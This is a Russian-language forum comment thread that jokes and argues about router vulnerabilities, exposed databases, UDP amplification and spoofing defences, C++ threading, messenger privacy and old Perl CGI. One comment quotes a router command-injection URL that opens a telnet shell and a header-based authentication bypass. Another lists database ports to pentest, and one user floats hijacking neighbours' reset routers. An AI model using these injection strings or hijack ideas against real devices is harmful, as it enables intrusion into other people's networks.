            • Роутеры — это не сервера ВК, прошивки ко всякому китайскому говну пишут тупые макаки, которые о «безопасности» слышали только один раз, на уроках сексуального просвещения. «Взломать» некоторые роутеры не сильно сложнее, чем «взломать» пароль BIOS, вынув батарейку.
              https://habr.com/ru/post/183314/
              >>> Т.е. пароль зависит от того, какая в устройстве версия прошивки. При чём пароль этот даёт root-привелегии к устройству

              https://habr.com/ru/post/400025/
              >>> Открываем в браузере страницу http://192.168.1.1/cgi-bin/;telnetd$IFS-p$IFS’56789′
              >>> telnet 192.168.1.1 56789

              https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11714
              >>> An issue was discovered on TP-Link TL-WR840N [...] devices. This issue is caused by improper session handling on the /cgi/ folder or a /cgi file. If an attacker sends a header of "Referer: http://192.168.0.1/mainFrame.htm" then no authentication is required for any action.
              Ответить
              • Про «реферер» очень смешно. Макака решила, что раз «реферер» содержит «/mainFrame.htm», значит, тебе удалось открыть страницу «/mainFrame.htm», а открыть её можно, только введя пароль. Отсюда макака сделала вывод, что такой «реферер» означает, что тебе когда-то раньше удалось ввести правильный пароль.

                Где-то в логическом выводе макаки должна быть дыра.
                Ответить
                • Про «telnet» тоже. Видишь там перед «telnetd» точка с запятой? Похоже, макака не нашла ничего лучше, чем приклеить строчку после «/cgi-bin/» к чему-то вроде «php -f » и передать в «system()». На это намекает и «$IFS», который используется вместо пробела.
                  Ответить
              • Потому что не надо юзать говно типа тплинк

                В Раш-ке надо юзать кинетик
                Ответить
          • Может быть здесь кто-то знает что это могут быть за IP, и я сброшу да введу снова.
            Ответить
            • Ну один из них Иньо должен знать, если у тебя белый ип. С маской и гейтом сложнее.
              Ответить
              • Масок в мире всего 31, на фоне 2^32-2 возможных IP это вообще спички.
                Ответить
            • >Может быть здесь кто-то знает что это могут быть за IP, и я сброшу да введу снова.

              IP это число из четырех байт. Соответственно, у тебя есть 2^32 вариантов.
              Кажется что много конечно, но IP не может быть нолем, и не может состоять из всех единиц, так что вариантов немного меньше...

              Попробуй разные
              Ответить
        • >> Они мне в прошлый раз какие-то айпишники надиктовывали.

          Мне мой провайдер надиктовывал айпишники DNS. Но это было избыточно, ибо он их и так через DHCP возвращает, да и широкоизвестные («Гугл», «Яндекс») тоже пашут.
          Ответить
    • никак не вспомнить

      поди почитай мануал от своего роутера, там будет инструкция по сбросу пароля
      Ответить
    • Оставлю здесь данные на всякий случай:
      Логин: gost
      Пароль: Govno123!
      Нихуя не смог настроить, придётся этим пидорам звонить.
      Ответить
    • Кстати, при сброшенных настройках подключиться к вифи может кто угодно. Отсюда можно реализовать следующий багор:
      Снифаем новые роутеры в округе, как только появляется новый - меняем пароль. В итоге сосед нихуя не сможет настроить. Какой багор )))
      Можно пойти дальше, и перепрошить , и выдавать фейковую админку с гоатсе.
      Можно пойти ещё дальше, и получить полный доступ к вроутеру так, чтобы сосед не был вообще в курсе.
      Ответить
      • > при сброшенных настройках подключиться к вифи может кто угодно

        Ты на какой помойке это говно нашёл?
        Ответить
        • Мне как раз удобно. У меня нет ни одного устройства с дыркой Ethernet.
          Ответить
          • Ну просто у нормальных роутеров на вайфае стоит довольно сложный дефолтный пароль, который на пузе написан или по wps выдаётся. Поэтому без физического доступа ты на него хуй зайдёшь.
            Ответить
      • Зато у пылесоса после сброса наружу торчит wifi точка, к которой может зацепиться любой чувак, у которого есть прога от xiaomi... Можно овладеть пылесосом, катать его по хате и смотреть на карту.

        З.Ы. А ещё можно перезалить ему прошивку и научить материться.
        Ответить
      • >Кстати, при сброшенных настройках подключиться к вифи может кто угодно
        хуйнч какая-то

        Обычно там или WPS или хотя-бы пароль рендомный на жопе написан
        Ответить
    • Кажется, я начинаю догадываться почему у меня инет не пашет. Зацените скиллы предыдущего хозяина: https://imgur.com/m1xaCVi
      Ответить
      • Разведи пары в разные стороны подальше друг от друга. Чтобы ёжик получился. Начнёт работать как нормальное соединение.
        Ответить
      • срежь нахуй скрутку, и поставь нормальную муфточку
        Ответить
        • Ладно, похуй.
          Я оставил заявку на обслуживание. Не факт, что только в этом дело, и пережимать мне нечем.
          Ответить
          • Фу! Позор! В саппорт пишут только анскильные лалки, цари чинят кабели сами!
            Ответить
            • антисёма

              а вообще обжималку полезно иметь, и тестер
              кроме шуток
              Ответить
              • Вообще можно и без обжималки сделать.
                Ответить
                • В идеале нужна либо обжималка либо крипингтул для запихиваня в муфточку.
                  Ответить
  • https://habr.com/ru/news/t/509496/
    > Хакер взламывает базы данных MongoDB и требует выкуп с угрозами слить персданные и сообщить в органы защиты GDPR
    > В начале июля 2020 года издания BleepingComputer и ZDNet сообщили, что злоумышленник смог получить удаленный доступ к более чем 22 тыс. баз данных MongoDB, часть из которых даже не были защищены паролями.
    Ответить
    • > взламывает

      Ну блин, если ты дверь забыл закрыть, то это не взлом. Зачем, зачем светить портами монги наружу?
      Ответить
      • Хипстеры-смузихлёбы небось настраивали. «MongoDB», «NoSQL», «JSON», вот это всё.

        > часть из которых даже не были защищены паролями
        Сервис без пароля, доступный снаружи всему Интернету. Да ещё и, судя по тому, что злоумышленник перезаписал данные, с правами на запись.
        Если он и правда сольёт их всех в «GDPR», то совершит благое дело.
        Ответить
        • Ещё типичная ситуация — «memcached» без пароля, торчащий наружу.
          Ответить
            • На некоторых сайтах в мемкэше можно отыскать свою учётку и поменять у неё роль на админа.
              Ответить
            • Ещё кое-что погуглил:
              1433 - Pentesting MSSQL - Microsoft SQL Server
              3306 - Pentesting Mysql
              5432,5433 - Pentesting Postgresql
              5984 - Pentesting CouchDB
              6379 - Pentesting Redis
              9200 - Pentesting Elasticsearch
              11211 - Pentesting Memcache
              15672 - Pentesting RabbitMQ Management
              27017,27018 - Pentesting MongoDB


              https://book.hacktricks.xyz/pentesting/27017-27018-mongodb

              >> By default mongo does not require password.
              >> Admin is a common mongo database.

              Какой багор )))
              Ответить
              • > By default mongo does not require password.
                Ох, блядь… А биндится она по дефолту к 0.0.0.0, да?
                Ответить
                • localhost судя по доке. Но они видимо всё по феншую делали и подняли один контейнер с монгой, а другой с приложухой.
                  Ответить
                  • и что? что мешало сделать интерфейс, доступный только другому контейнеру?
                    Ответить
            • >> амплифицироваться

              Поскольку UDP не требует установления соединения (обмена SYN- и ACK-пакетами, как в TCP), то в поле FROM можно указать чужой айпишник, чтобы мемкэш насрал под чужую дверь?
              Ответить
              • Да. Амплификация через UDP-сервисы — давнишняя и очень, очень сильная боль в жопе у сетевых сервисов. Суть в том, что такие типы атак просты, эффективны и не требуют каких-то сложных телодвижений, вроде рассылки вирусов для создания ботнета или массового взлома камер (ЕМНИП, ботнетом из поломанных вебок в своё время сети «Sony» положили). В то же время, при наличии, скажем, гигабитного сервера, хостер которого с пониманием относится к подозрительному исходящему трафику, и хорошего списка уязвимых сервисов (которые с того же сервера сканируются за полдня), можно легко организовать неплохую атаку в 30-50 гигабит, которая выведет из строя любой сервер без надлежащей защиты.
                Одним из первых типов таких атак были, если мне не изменяет память, амплификация через открытые DNS-резольверы: где-то в начале десятых годов через них провели рекордную на тот момент атаку то ли в 500 гигабит, то ли вообще в терабит. Потом обнаружили серверы с NTP, потом метой стали атаки через SSDP, «Memcached»-амплификацию изобрели эдак пару-тройку лет назад, точно не помню. А ещё можно амплифицироваться через серверы популярных UDP-игр, вроде «Counter Strike», «Garry's mod», «Team Fortress» и прочих, но это совсем экзотика.
                Ответить
                • Это, кстати, хороший пример того, как проёб в архитектуре (во времена, когда придумывали «IP», подразумевалось, что все пользователи — вежливые и хорошие люди, и делать плохих вещей не будут) доставляет гору неприятностей и миллионы долларов убытков через десятки лет после того, как этот проёб был допущен.
                  Ответить
                    • У BGP была примерно такая же атака, когда ты вдруг начинал анонсировать пирам чужие префиксы (см инцидент 7007, например).

                      Но потом ушлые админы стали фильтровать анонсы левых префиксов, а сревисы типа bgpmon стали писать тебе письмо, когда твои префиксы анонсит какой-то хуй
                      Ответить
                        • [quote]
                          A BGP session can be configured with a hard limit of prefixes to be received. This means a router can decide to shut down a session if the number of prefixes goes above the threshold. Had Verizon had such a prefix limit in place, this would not have occurred
                          [/quote]

                          То-есть верайзон не может позволить себе выскоквалифицированных сетевых инженеров, да?
                          Ответить
                          • Наверное, это им показалось экономически невыгодным.
                            Ответить
                  • Так ведь «Интернет» начинался с «Арпанета» — сети для муриканских военных. В «Арпанет» выходили серьёзные дяди в погонах с компьютеров с инвентарными номерами. Если бы кто-то в «Арпанете» попытался похулиганить, его бы быстро нашли и в должности понизили.

                    Потому, видимо, все протоколы изначально были с фатальными недостатками. Например, «е-мейл», у которого в поле «From:» можно было указать хоть ящик Президента. Или идиотские протоколы «SMTP after POP» и «POP after SMTP» (погугли соответствующие RFC, поржёшь, как конь).
                    Ответить
                  • Когда-то была проблема со спамом: люди слали спам с левых адресов.
                    Потом сделали списки мудаков, и стали их банить: тупо не принимать от них письма.

                    В какой-то момент провайдеры стали пиздить своих пользователей, когда те шлют спам, чтобы самим не заблочиться.

                    Точно так же можно поступить и тут: пусть каждый провайдер обязуется проверять FROM для всех пакетов, исходящих из его автономки.
                    Если он этого не делает, то его объявляют педерастом, и все пиры рвут с ним отношения.

                    Конечно, все еще можно будет наебать людей внутри одной автономки, но это куда сложнее
                    Ответить
                    • > Точно так же можно поступить и тут: пусть каждый провайдер обязуется проверять FROM для всех пакетов, исходящих из его автономки.
                      > Если он этого не делает, то его объявляют педерастом, и все пиры рвут с ним отношения.
                      Примерно так сейчас и происходит, только с поправкой на то, что Интернет — дохуя огромная, медленная и неповоротливая структура.
                      Ответить
                • А провайдерские маршрутизаторы с DPI не могут зарубить UDP-пакеты со странным обратным адресом?
                  Ответить
                  • Кажется, что даже DPI не нужен.

                    У тебя есть IP пакет. У него прямо на сетевом уровне написан FROM.
                    Ты накладываешь на FROM маску, и получаешь адрес сети.
                    Если FROM не из той сети, которая на самом деле должна быть в той стороне, откуда пришел пакет, то ты его грохаешь.
                    Ответить
                    • Да, до меня чуть позже дошло. Рубится простыми средствами типа iptables. Можно даже фильтровать любые IP-пакеты, не выясняя, какой там протокол следующего уровня.

                      Это даже легче, чем фильтр по портам, потому что для определения порта нужно вытянуть следующий уровень (TCP, UDP, RDP, SCTP, что там ещё с портами бывает).
                      Ответить
                      • порта может и вовсе не быть, а FROM есть всегда.
                        Ответить
                        • Подтверждаю. В «RTP» нет вообще никаких портов. Именно поэтому я за «RTP».
                          Ответить
              • >то в поле FROM можно указать чужой айпишник
                Почему бы провайдеру не грохнуть такой пакет прямо на выходе из сети? Он же прекрасно знает, что FROM к нему не относится.
                Ответить
                • Потому что для этого надо, во-первых, знать о спуфинге (это, как ни странно, не настолько распространённое знание), а во-вторых — грамотно настраивать оборудование. Как ты понимаешь, количество админов-макак не сильно меньше количества макак-программистов, так что имеем что имеем.

                  Справедливости ради, где-то лет пять-семь назад провайдеры таки стали шевелиться, и у большинства такой фокус действительно не пройдёт. Собственно, именно поэтому Интернет ещё работает: чтобы вдоволь наамплифицироваться, нужно либо найти провайдера, сеть которого делали не очень умные люди, либо провайдера, который намеренно позволяет такое делать. В первом случае сервера атакующего, скорее всего, быстро забанят (даже полный долбоёб не сможет не заметить гигабиты какого-то мусорного трафика, взявшегося непонятно откуда), а во втором случае за сервера придётся раскошелиться, и раскошелиться серьёзно (если мне не изменяет память, лоу-левел впски лет пять назад там стоили где-то в районе двухсот долларов), причём нет гарантии, что провайдер не решит тебя послать нахуй.

                  Ещё есть какой-то RFC, который определяет комплекс мероприятий против спуфинга (что-то вроде того, что если в твою сеть прилетает пакет из AS1, а в src указан AS2, то его надо слать нахуй), но я деталей совсем не помню.
                  Ответить
                  • Так я предлагал банить тех, кто не может в нормальную настройку оборудования.

                    Вот просто публиковать в интернетиках блеклисты сетей, из которых течет говно. Ты помнишь про блеклисты для почты?

                    Со стороны провайдера есть вот такая пишутня
                    https://en.wikipedia.org/wiki/Reverse-path_forwarding

                    In strict mode, each incoming packet is tested against the FIB and if the incoming interface is not the best reverse path the packet check will fail. By default failed packets are discarded.

                    example command on Cisco devices:
                    $ ip verify unicast source reachable-via {rx} - Strict mode, {any}- loose mode

                    https://tools.ietf.org/html/rfc3704

                    То-есть если пакет пришел не из той дырки, в которую бы должен был улететь пакет на его FROM, то пакет идет нахуй.

                    Это может плохо работать, когда у тебя сложный роутинг, правда.

                    Кстати, и прыщ умеет
                    https://tldp.org/HOWTO/Adv-Routing-HOWTO/lartc.kernel.rpf.html
                    https://www.theurbanpenguin.com/rp_filter-and-lpic-3-linux-security/

                    То-есть ты просто включаешь RPF, и течешь. Кривые пакеты (они называются "марсианские") можно логировать, и выдавать потом пиздюлей маминым хакерам.


                    В целом же есть вот такой RFC: https://tools.ietf.org/html/rfc2827
                    Он явно советует провайдерам не принимать траффик от пользователя, если там кривой FROM.

                    Провайдеры обязаны уважать RFC, иначе их нужно банить.
                    Ответить
                    • Проблема в том, что провайдеров много, а определить, какой из них клал хуй на стандарты, можно только после того, как к нему пропишутся предприимчивые люди и начнут срать. Более того, до тех пор, пока поток говна не сильно выделяется на общем фоне (какой-нибудь лишний десяток гигабит трафика, скорее всего, вообще не заметят), пристально анализировать его никто не будет.

                      Но, как я уже писал ниже, работа ведётся, и сейчас найти провайдера-раздолбая достаточно сложно.
                      Ответить
        • > и правда сольёт их в GDPR

          Я бы на его месте тупо слил их в GDPR. Один хер биткоины никто не пришлёт. Да и долбоёбы должны страдать.

          Правда чиновники, которые отвечают за соблюдение GDPR, скорее всего анонимные заявления не принимают?
          Ответить
          • > Да и долбоёбы должны страдать.
            Подтверждаю. А долбоёбы, которые хранят чужие данные в открытых всему Интернету монгах, должны страдать вдвойне.

            > анонимные заявления не принимают?
            ЕМНИП, если у кого-то данные утекли в паблик, то чиновники должны этого кого-то наказать даже без заявлений, но это не точно. Надо гуглить.
            Ответить
            • Ну возбудить против них какую-нибудь проверку или аудит я думаю можно при желании. На крайний случай найти какого-нибудь безбашенного активиста, который от своего имени всё это зарепортит.
              Ответить
          • База хер пойми чья, жалуется анонимус, владельцы ПДн не заявляли. Чиновник только пальчиком помашет - нельзя так делать - и положит болт.
            Ответить
          • В GDPR действительно есть пункт (Глава 2 Статья 5 Пункт 1f сукабляпестец), что Personal data shall be processed in a manner that ensures appropriate security of the personal data, including protection against unauthorised or unlawful processing and against accidental loss, destruction or damage, using appropriate technical or organisational measures (‘integrity and confidentiality’)

            Только вот действие GDPR распространяется только на граждан и подданных стран Евросоюза. Как можно доказать, что человек по имени John Doe из рандомной базы имеет паспорт, например, Британии, я не знаю.
            Ответить
    • >> По истечении 48 часов мы выложим в открытый доступ все ваши данные.

      Где можно посмотреть опубликованные базы?
      Ответить
    • Помнится лет 5 назад я сканил один диапазон амазоновских айпишков в поисках монгодб. Нашлись сотни незапароленых. Но заработать на этом я не догодался. Видимо слишком правильный.
      Через пару лет снова проверял - там в базах были сообщения о выкупе данных.
      Ответить
      • Это при том, что в AWS нужно явно открывать наружу порты через Security Groups.
        99% людей -- идиоты.
        Ответить
  • В пабликах «ВК» начал замечать на фотках водкамарку «Redmi note.. чтототам». Китайцы совсем уже охуели такое на фотки накладывать?
    Ответить
  • Петушоки, на сколько нормально такое писать, и не отстрелить себе яйца?
    void functsiya_vizivaemaya_iz_mnogo_potokov() {
        static Petuh petya = get_real_potoko_nebezopasniy_pituh();
        …
    }
    Ответить
    • N4842, [stmt.dcl], 4:
      Dynamic initialization of a block-scope variable with static storage duration (6.7.5.1) or thread storage
      duration (6.7.5.2) is performed the first time control passes through its declaration; such a variable is
      considered initialized upon the completion of its initialization. If the initialization exits by throwing an
      exception, the initialization is not complete, so it will be tried again the next time control enters the declaration.
      [!] If control enters the declaration concurrently while the variable is being initialized, the concurrent execution
      shall wait for completion of the initialization. If control re-enters the declaration recursively while the
      variable is being initialized, the behavior is undefined.


      Нормально, если внутри самой get_real_potoko_nebezopasniy_pituh() нет гонок (т.е. она не читает и не пишет данные, к которым обращаются другие потоки).
      Ответить
      • Можешь пояснить? То есть get_real_potoko_nebezopasniy_pituh лочится, и конкурентно не выполняется?
        Ответить
        • Да, get_real_potoko_nebezopasniy_pituh() вызовется только один раз, остальные потоки подождут завершения инициализации.
          Ответить
  • В «WhatsApp» можно безопасно открывать доступ к контактам? Почему там нет такой хуйни (с брутфорсом номеров), как в телеге?
    Ответить
    • Эта уйня разослала уведомления всем, что я присоединился? И в какой момент?
      Ответить
      • Социобляди должны страдать.

        Когда ты ставишь раковый месседжер или входишь в раковую соцсеть (А все социопараши последних двадцати лет -- раковые), то ты должет быть готов к тому, что каждый раз, когда ты пернешь, об этом будет выслано уведомление всем, с кем ты хоть раз в жизни поздаровался с последние двадцать лет.
        Ответить
        • А хуле делать, если для связи с одним человеком я должен поставить ещё один мессенджер?
          Ответить
          • Сказать "Дорогой мой человек, вот тебе моя электронная почта. Можешь мне писать как только захочешь!"
            Ответить
              • Так возьми у нее электронную почту
                Ответить
                • Что сразу она то? Это фитнес-тренер.
                  Ответить
                    • Скайп уже давно опустился на дно.
                      Ответить
                      • Скайп не позволяет видеть мой статус всем, у кого я в адресной книге.

                        Скайп, при всех своих минусах, намного безопаснее (с точки зрения прайваси) чем телеграм
                        Ответить
                        • Да кого ебёт твой статус... За тобой там прям сталкеры следят и проверяют во сколько ты спать лёг?
                          Ответить
                          • Я же кажется рассказывал, как поставил телегу, и людям сразу сообщили, что я теперь в телеге и онлайн.

                            Я не хотел в этот момент этим людям об этом сообщать.
                            Кажется, что я вполне имею право этого не хотеть по каким-то психологическим, эмоциональным или каким-то другим причинам.

                            Из того, что некто десять лет назад ввёл мой номер в свою записную книжку, вовсе не следует, что я хочу этому человеку прямо сейчас срочно сообщить, что я теперь онлайн.
                            Ответить
                        • Справедливости ради, отображение статуса и last online можно отключить и в «Телеграме» (правда, ЕМНИП, и сам ты в таком случае не будешь видеть, когда последний раз в онлайне были твои друзья).
                          Ответить
                          • Почему тогда не так по умолчанию?
                            Ответить
                              • Отож.

                                Но есть ощущение, что в целом privacy стало цениться как-то сильно меньше.

                                Соцсети тоже показывают кто был онлайн и когда
                                Ответить
                                • В одноклассниках, емнип, даже показывалось кто читал твою страницу. И был платный режим невидимки чтобы ходить по чужим страницам без палева. Вот где апофеоз приватности.
                                  Ответить
                                  • Мир вуаеристов какой-то, брр.

                                    Предлагаю считывать GPS координаты и писать сразу где находится автор страницы
                                    Ответить
                                      • Ну люди же пихают свои фотки в аватарки на гитхабе, люди любят, когда на них смотрят.

                                        А еще они любят в инфе писать "любящий отец, сын, муж, фотограф, скейтбордист и программист".

                                        Когда пишу issue или шлю пулреквест, всегда такое читаю, это очень важно же
                                        Ответить
                                          • >коммит
                                            форс пуш тогда уж
                                            Перед коммитом можно и не молица
                                            Ответить
                                            • и сразу деплой на прод, без тестов. Типа код "безопасный"
                                              Ответить
                                              • >деплой на прод,
                                                по FTP в тотал коммандере
                                                Ответить
                                    • Нужен аукцион.

                                      Твой телефон может выставить максимум N рублей, а телефон звонящего -- M рублей.

                                      Кто больше -- тот и сработет.
                                      Деньги ваши опсосы делят пополам (ну или всё себе забирает, если один).

                                      Ты просто устанавливаешь N (или максимум рублей в сутки)
                                      Ответить
                                      • Надо ещё с ожиданием/удержанием вызова такую питушню сделать.

                                        Боб звонит Алисе, но она уже разговаривает с Чарли. Боб хочет, чтобы Алиса перевела соединение на него, и выставляет N рублей. Чарли не хочет отпускать канал связи, и выставляет M рублей, чтобы сохранить соединение. Кто больше в итоге выставит, тот и будет разговаривать с Алисой.
                                        Ответить
                                        • Калым еще нужен. Хочешь поговорить с Алисой?
                                          Плати денег её родителям.
                                          Ответить
                                  • >> В одноклассниках, емнип, даже показывалось кто читал твою страницу.

                                    Список «гостей» твоей страницы есть во многих соцсетях. Нет списка гостей только в «ВК» и в «ФБ».

                                    Однако, в «ВК» всё равно есть приложения (в смысле IFRAME-апплеты), которые показывают список тех, кто читал твою страницу. Как? Размещаешь на своей стене ссылку на это приложение, а ВК через API статистики сливает владельцу приложения список тех, кто видел эту ссылку.

                                    В других соцсетях можно датамайнить бигдату через API рекламы.
                                    Ответить
                                    • > видел ссылку

                                      Звучит как пиздежь. Точно не кликнуть?
                                      Ответить
                                      • Точно.

                                        1. ВК знает, на каких страницах размещена ссылка.
                                        2. ВК знает, кто смотрел какие страницы.
                                        Следовательно, ВК знает, кто видел какие ссылки (даже не кликая).
                                        Ответить
                                        • Все равно слабо верится. Давай, размести у себя такую ловушку, кинь на почту, а я зайду (если получится, ты меня сливать не будешь).
                                          Ответить
                                          • Проверю одно такое приложение. Попробуй зайти на эту страницу (не думаю, что по этой ссылке толпа ломанётся, поэтому вариантов у меня будет немного):
                                            https://vk.com/id91498424
                                            Ответить
                                            • Зашёл, проверь.
                                              Побыл секунд 10 на странице, кликнул на «подписчиков», больше ничего не кликал.
                                              Если нашёл - пиши в ЛС.
                                              Ответить
                                              • Питушня какая-то. Показывает гостей, которые заходили в промежутке от 3 до 9 лет назад (и они реально заходили), новых не показывает.

                                                Кинул на стену вторую ловушку. Попробуй зайти ещё раз.
                                                Ответить
                                                • Зашёл, проверь.
                                                  Очевидно, что это так не работает. Иначе было бы ебаное днище. Они там максимум по лайкам и комментам могут собирать статистику, которая доступна публично.
                                                  Ответить
                                                  • Возможно, ты прав. Я сейчас редко бываю в ВК, поэтому могу заблуждаться.

                                                    Но вроде раньше эта хрень ловила и тех, кто ничего не лайкал. Возможно, три года назад эту дыру прикрыли, поэтому у меня в статистике ничего нет за последние три года.
                                                    Ответить
                                    • В «ВК» ещё можно нажать на кнопку удаления страницы, там в последнем предупреждении будут выведены три человека, которые посещали твою страницу чаще всего.
                                      Так что да, статистику посещений «ВК» пишет, просто не показывает.
                                      Ответить
                                      • > три человека, которые посещали

                                        Какая конфиденциальность )))
                                        Ответить
                                      • В вк не сижу но слышал что там "тройка лидеров" - это те с кем у тебя в верхушке списка друзей
                                        Ответить
                                        • Это более похоже на правду. А зачем их показывать? «Не удаляйся пожалуйста, как эти люди будут без тебя»?
                                          Ответить
                                      • Там всё хуже. Несколько лет назад из-за глюка несколько обычных пользователей увидели панель модератора «ВК». Там было дофига данных, даже «вектор интересов» на основании твоих действий в соцсети.
                                        Ответить
                                          • > вектор интересов

                                            У гугла его кстати можно посмотреть в своём профиле. И даже поправить вроде.
                                            Ответить
                            • Потому что идите нахуй, заебали «скрытные».
                              Ответить
        • Вообще, я конкретный вопрос задал. Борманд вроде хвалил, что такой параши там нет.
          Ответить
          • Но тем не менее, я вижу фотки своих контактов, и почему я так же не могу сбрутить все номера, как в телеге?
            Ответить
          • Смысл, в том, что ватсап не претендует на псевдонимность в отличие от телеги. Он для общения с людьми, которые знают твой номер телефона.

            А телега даёт тебе возможность пообщаться с рандомными людьми из инета. Но делает это крайне хуёво. А потом её базу брутят. И теперь эти рандомы из инета знают твой номер телефона. См. замечательный пример про страйкера.
            Ответить
            • Что мешает мне сбрутить все телефоны, и построить базу (имя, фотка, телефон) в «WhatsApp»?
              Ответить
              • Ничто не мешает. Но вот, к примеру, про меня ты там кроме номера телефона ничего и не увидишь. А в телеге ты бы увидел как минимум мои сообщения в каких-нибудь публичных каналах.
                Ответить
                • Для этого нужно пропарсить все публичные чаты? Так в WA и нету публичных чатов?
                  Ответить
                  • ДА! И я не могу поделиться с рандомом из инета ссылкой на свой вацап профиль, как мог бы сделать в телеге. Мне для этого надо будет дать ему номер телефона. А тогда никакой утечки уже нет и быть не может.
                    Ответить
              • Ну т.е. основной поинт в том, что вацап - это просто расширение стандартной звонилки. Только ты можешь поставить аватарку и не платить опсосу конский ценник за смс. Всё, больше он нихуя не умеет и ни на что он не претендует.

                Поэтому даже если он разошлёт всем твоим контактам "guest8 теперь в вацапе", то что? Они заспамят тебя сообщениями и звонками через вацап потому что им теперь опсосу платить не надо?
                Ответить
                • В чём отличие от телеги, если я не сижу в паблик чатах?
                  Ответить
                  • Если ты телегу юзаешь только как расширение звонилки и только для ИРЛ контактов - ни в чём. Но нахуй она тогда нужна?
                    Ответить
            • Любая программа, требующая номер телефона, не может никакой псевдонимности гарантировать в принципе.

              В Раиссе номер телефона в паспорту привязан. Считай, что при входе в телеграм ты сообщаешь телеграму свой номер паспорта
              Ответить
                • А как можно не хуёво это сделать?

                  Если где-то во вселенной есть привязка твоего номера к твоему нику в каком-то месенджере, то эту информацию спиздят рано или поздно.

                  Любой сотрудник твоего опсоса умеет получить твое имя по номеру.

                  Ситема, где есть привязка номера к нику не может быть безопасной by design.

                  Если IP ты еще можешь как-то спрятать (тор, три VPNки в разных частях мира итд), то симку без паспорта в России ты не получишь легально.

                  А если и даже нелегально, то всё равно они будут знать с какими вышками ты общался, и смогут примерно понять твою локацию.
                  Ответить
                  • Ну одно дело, когда этот номер просто хранится на серваке и надо взломать сервак чтобы его получить. Как например в гмейле для двухфакторки.

                    Другое дело, когда мамкины хакеры тупо через официальное апи брутят базу ничего не взламывая. А разрабы даже не считают это уязвимостью.
                    Ответить
                    • Соглашусь. У телеги это сделано еще более хуёво.

                      Кроме того, гугл не орет на весь мир, что он "суперзащищенный"
                      Ответить
                      • Ну и в гугле в общем-то можно через оффлайн приложуху 2FA настроить. Как и в дискорде и на куче других сайтов.
                        Ответить
                  • > Ситема, где есть привязка номера к нику не может быть безопасной by design.
                    Именно в этом и проблема. Именно поэтому «Телеграм» — говно.
                    Ответить
    • >> Днем я сидела с ребенком, по ночам кодила плохие сайты на php — это позволяло как-то держаться.

      Ничего не понял. Но именно поэтому я за «PHP».
      Ответить
      • Что не понятно?
        У девушки психиатрическое расстройство. Понятно, что полноценно работать с таким диагнозом сложно, но делать сайты на пхп вполне можно. А что, было бы лучше, если бы она коробочки клеяла?
        Ответить
          • "Две недели назад я написала пост с каминг-аутом, что я пишу на PHP"
            Ответить
              • Ну раз уж речь зашла о камин-аутах, я тоже одно время писал на "PHP".
                Ответить
                • Здесь есть те, кто какал на «PHP»?
                  Ответить
                • В начале нулевых опасность ПХП еще не была так очевидна, зато популярность была высока. Молодые люди пробовали ПХП по разным причинам: кто-то сдуру, кто-то по совету друзей ("смотри, какой я сайт сделал"), а кто-то просто от скуки.

                  Только потом мы поняли, как это страшно.
                  Когда мы увидели всех этих программистов с восьмилетним опытом, которые пишут кашу их скулинъекции и HTML, вот тогда-то нам стало действительно страшно. Мы поняли: пхп поражает мозг. И мы успели соскочить.
                  А те, кто остался, тем уже не помочь, к сожалению
                  Ответить
                  • А кто помнит, как писали cgi на перле?
                    Как надо было
                    AddHandler cgi-script .cgi .pl

                    чтобы привязать расширение к mod_cgi, как скрипты надо было выносить в отдельную папку (еще в 1999м году всем было очевидно, что их не надо хранить в htdocs) и пролписывать ее как ScriptAlias, той папке делать
                    Options +ExecCGI

                    а самому скрипту делать ``chmod +x``, и как потом в перле было
                    use CGI;
                    my $cgi = CGI->new();
                    print $cgi->header;
                    Ответить
                      • Да, перл уступил место пыхоговну году так в 2002-му -- 2003-му
                        Ответить
                    • Решил посмотреть, как там апаче под винду поживает.
                      А его надо из сырцов собирать, но поскольку там няшная, то работает примерно везде одинаково: достаточно иметь "Visual Studio Command Prompt", perl, nmake (он идет с тулчейном) и ..

                      APR: теплый ламповый апачевый рантайм
                      https://en.wikipedia.org/wiki/Apache_Portable_Runtime

                      Он, правда, тоже легко скачивается. Но зацените бугор: они его распостраняют отдельно
                      Ответить
                      • У «Апача» (в смысле не у сервера, а у «Apache Software Foundation») всё так. Скачиваешь софт — выясняешь, что для сборки нужно ещё скачать какую-нибудь их библиотеку.
                        Ответить
                        • Угу

                          Потом он попросил xpat, потом pcre, потом я забил хуй. В пизду, скачаю бинарь, если прирет.

                          К чести апача надо сказать, что он не тупо падает с непонятной ошибкой, а пишет, чего ему нехватает.
                          Ответить
                          • ебать, оно работает:)
                            #!C:\Strawberry\perl\bin\perl.exe
                            use strict;
                            use CGI;
                            my $cgi = CGI->new;
                            print $cgi->header;
                            
                            my $name = $cgi->param('name');
                            print "Hello, $name";

                            /cgi-bin/1.cgi?name=MAKAKA

                            Интересно, что индеец на винде умеет в шебанг: он реально считал путь к перлу из него, и запустил CGI.

                            При этом:
                            * все файлы запускаются строго из cgi-bin (в unix я бы еще должен был сделать им +x)
                            * работа с БД только через параметры DBI, никакого injection
                            * ошибки (в случае если скрипт вернул не 0 или не выдал заголовки) идут в logs/error.log, а в браузер идет 500.

                            Язык богов! Мир, который мы потеряли...
                            Ответить
                            • Как же я ору. Привязка хешей к dbm все еще работает

                              #!C:\Strawberry\perl\bin\perl.exe
                              use strict;
                              use CGI;
                              my $cgi = CGI->new;
                              print $cgi->header;
                              
                              my $ip = $ENV{'REMOTE_ADDR'};
                              my %USERS;
                              
                              dbmopen %USERS, 'c:/temp/users', 0666;
                              my $visited = $USERS{$ip} - 0;
                              $USERS{$ip} = $visited + 1;
                              dbmclose %USERS;
                              
                              print "You are from $ip, visited $visited times\n";
                              Ответить
                  • Попробуй PHP.
                    Взрослые говорят что он вреден, но это ложь.
                    Ты сможешь отказаться PHP в любой момент.
                    PHP делает жизнь интереснее и ярче.
                    Если использовать PHP редко, то зависимость не возникает.
                    Ответить
                    • Подтверждаю. Это каждый петух знает.
                      Ответить
                        • Здравствуйте! Мне 18 лет.
                          Все началось давно, 5 лет назад.

                          Тогда я попробовал всего лишь безобидный скриптовый язык. Мне понравилось. Через время я попробовал еще и еще. Но все бы ничего, около года я так иногда кодил немного.

                          Но в 15 лет я по настоящему влюбился, и эту девушку я люблю до сих пор. Я очень много общался с ней и т.п но она мне отказала... тогда я начал много кодить. Кодил сайты пачками, в 16 лет попробовал «Python» причем сразу «Django». И тогда же попробовал jQuery, JavaScript. Из нормального, подающего надежды ученика я превратился в фронт-энд кодера. Время не заставило себя ждать.

